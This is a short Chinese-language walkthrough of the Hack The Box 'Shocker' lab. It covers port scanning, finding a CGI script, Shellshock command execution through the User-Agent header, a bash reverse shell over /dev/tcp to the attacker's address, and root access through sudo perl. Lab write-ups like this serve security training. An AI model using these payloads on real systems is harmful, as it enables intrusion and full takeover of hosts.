【Hack The Box】linux练习-- Shocker
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月7日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4f8ade8f80477decf150d630a187e49 (RSA)
| 256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_ 256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
发现没有开放的页面
然后目光转向ssh,发现最多能造成用户名信息泄漏
但是不是简单枚举,而是相当于爆破枚举
这太难了,我们换下一条路
但是目前只有80和2222的ssh
80还能怎么看呢?
接下来目光放在cgi目录上,因为之前打vulnhub的时候发现cgi跟shellshock常常是绑定在一起的,通过一个固定的魔术字符串从而造成命令执行,在web页面中的话,我们需要更细致的扫描一下,看看是否能获得一些信息
以sh,cgi,pl做后缀
feroxbuster -u http://10.129.12.37/cgi-bin/ -x sh,cgi,pl
http://10.129.12.37/cgi-bin/user.sh
这是一个非常典型的cgi头部信息
我们再次访问的时候抓个包,加上秘书字符串以及命令,先尝试一下,这里注意命令要绝对路径,因为在shellshock 的shell中没有环境变量,注意建议在ua部分添加命令,因为这里脆弱
User-Agent: () { :;}; echo; /usr/bin/id
id命令执行成功,加下来用基于icmp的方法反弹shell,通用方法
User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.63/6666 0>&1
sudo -l
发现perl可以
https://gtfobins.github.io/gtfobins/perl/
sudo perl -e 'exec "/bin/sh";'